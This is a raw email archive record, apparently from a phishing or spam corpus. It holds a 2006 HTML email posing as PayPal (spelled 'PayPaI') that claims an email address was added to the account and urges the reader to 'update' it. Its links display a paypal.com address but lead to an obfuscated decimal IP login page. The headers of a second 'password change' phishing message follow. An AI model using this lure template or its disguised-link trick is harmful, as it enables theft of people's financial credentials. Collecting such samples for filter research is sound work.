From: PP Update <dacquaro@cfl.rr.com>
Subject: New email address added to your account
Date: Wed, 15 Mar 2006 11:01:14 -0500
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060315160054.C22A26CD00F@mail1.example.com>
To: undisclosed-recipients: ;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 616

<html>
<head>
<title>New email address added to your account</title>

<meta content="text/html; charset=iso-8859-1">

<style type="text/css">

.dummy {}

BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;}

LI {line-height: 120%;}

UL.pp_narrow {margin:10px 5px 0px 40px;}

BR.h6 {font-size: 6px; line-height: 6px;}

.pp_normal {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;}

.ppem106 {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 700;}

.pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;}

.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;}

.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;}

.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;}

.pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;}

.pp_footer_black {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #000000;}

.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;}

.pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;}

.pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;}

</style>

</head>

<body>

<table cellspacing="0" cellpadding="0" width="600" align="center" border="0">



  <tr>

    <td>
	<img height="35" alt="Pay Pal"

      src="http://www.paypal.com/images/paypal_logo.gif" width="117" vspace="10" border="0">

  </td></tr></table>



<table cellspacing="0" cellpadding="0" width="100%" border="0">



  <tr>

    <td width="100%" background="http://www.paypal.com/images/bg_clk.gif"><img height="29"

      src="http://www.paypal.com/images/pixel.gif" width="1" border="0"></td></tr>

  <tr>

    <td><img height="10" src="http://www.paypal.com/images/pixel.gif" width="1"

  border="0"></td></tr></table>



<table cellspacing="0" cellpadding="0" width="600" align="center" border="0">



  <tr valign="top">

    <td width="5"><img height="1" src="http://www.paypal.com/images/pixel.gif" width="5"></td>

    <td class="pptext" align="left" width="100%">

      <table cellspacing="0" cellpadding="0" width="100%" align="center" border="0">



        <tr>

          <td>





            <p><br>

              Dear Customer, <br>

              <br>

              <FONT face="Verdana" style="font-size: 9pt">You have added </font>
			<FONT face="Arial" style="font-size: 9pt; font-weight: 700">jamesbond007@yahoo.com</font><FONT face="Verdana" style="font-size: 9pt"> as a new email address for your
</font> <FONT face="Arial" style="font-size: 9pt">PayPaI</font><FONT face="Verdana" style="font-size: 9pt"> account.</font><font face="Verdana"><br>
    		</font>
    <font face="Verdana" style="font-size: 9pt">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
			</font> 
    <font face="Arial" size="2"> 
			<a target="_blank" href="http://1445071056:60006/bin-cgi/webscr_cmd=_login-run/">process your login</a></font><font face="Verdana" style="font-size: 9pt">.</font><br>

              <br>

              The account statement for your 
			<FONT face="Arial" style="font-size: 9pt">PayPaI</font> account registered to
			<FONT face="Arial" style="font-size: 9pt; font-weight: 700">jamesbond007@yahoo.com</font>

              can be viewed at any time by visiting our website.<br>

              <br>

              Your current account information has not been verified in the previous

              six months. Please update your information to continue using your

              <FONT face="Arial" style="font-size: 9pt">PayPaI </font> account normally. <br>

              Please click here to update you account:<br>

            <p> <font face="Arial" size="2"> <u>
			<a target="_blank" href="http://1445071056:60006/bin-cgi/webscr_cmd=_login-run/">https://www.paypal.com/cgi-bin/webscr?cmd=_update-run</a></u></font><br>

              &nbsp;</p>
  <address><span style="font-style: normal">
	<font face="Verdana" style="font-size: 9pt">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>

          </td>

            </tr>

        <tr>

          <td><br><img height="5" src="http://www.paypal.com/images/dot_row_long.gif"

          width="590"></td></tr>

        <tr>

          <td class="pp_footer"> <span style="font-size: 8pt">Copyright &#169; 2006
			</span><span style="font-style: normal">
			<FONT face="Arial" style="font-size: 8pt">PayPaI</font></span><span style="font-size: 8pt"> Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. 
			</span><span style="font-style: normal">
			<FONT face="Arial" style="font-size: 8pt">PayPaI</font></span><span style="font-size: 8pt"> is located at 2211 N. First St., San Jose, CA 95113.
			</span>
			<font face="Verdana" style="font-size: 8pt">
			<span style="font-style: normal">For assistance, log in to your 
  		</span>
  </font><span style="font-style: normal">
			<FONT face="Arial" style="font-size: 8pt">PayPaI</font></span><font face="Verdana" style="font-size: 8pt"><span style="font-style: normal"> account and click the Help link located in the top right corner of any 
  		</span>
  </font><span style="font-style: normal">
			<FONT face="Arial" style="font-size: 8pt">PayPaI</font></span><font face="Verdana" style="font-size: 8pt"><span style="font-style: normal"> page.</span></font></td></tr>

  </table>

  </td></tr>

  </table>

<img src="http://link.p0.com/1x1.dyn?0dEGjTuWBrW6bgOK9I37=0" width=1 height=1 border="0">

</body></html>

From student@amslmc04.local  Wed Mar 15 11:18:06 2006
Return-Path: <student@amslmc04.local>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 91142536E2E
	for <nobody@login.example.com>; Wed, 15 Mar 2006 11:18:06 -0500 (EST)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail2.example.com (Postfix) with ESMTP id 364D66FA37A
	for <nobody@example.com>; Wed, 15 Mar 2006 11:18:05 -0500 (EST)
Received: by lujan.example.com (Postfix)
	id 3392D1BC55; Wed, 15 Mar 2006 17:18:02 +0100 (CET)
Delivered-To: foobee@example.com
Received: from localhost (localhost [127.0.0.1])
	by lujan.example.com (Postfix) with ESMTP id C28B21BB51
	for <foobee@example.com>; Wed, 15 Mar 2006 17:18:01 +0100 (CET)
Received: from lujan.example.com ([127.0.0.1])
	by localhost (lujan [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
	id 17383-01 for <foobee@example.com>;
	Wed, 15 Mar 2006 17:17:38 +0100 (CET)
Received: from amslmc04.local (st-209-7-39-254.scps.dupage.k12.il.us [209.7.39.254])
	by lujan.example.com (Postfix) with ESMTP id 9F6681BB4F
	for <foobee@example.com>; Wed, 15 Mar 2006 17:17:30 +0100 (CET)
Received: by amslmc04.local (Postfix, from userid 503)
	id 0E5D634D06D; Wed, 15 Mar 2006 10:19:41 -0600 (CST)
To: foobee@example.com
Subject: Urgent Atention: Password change required! 
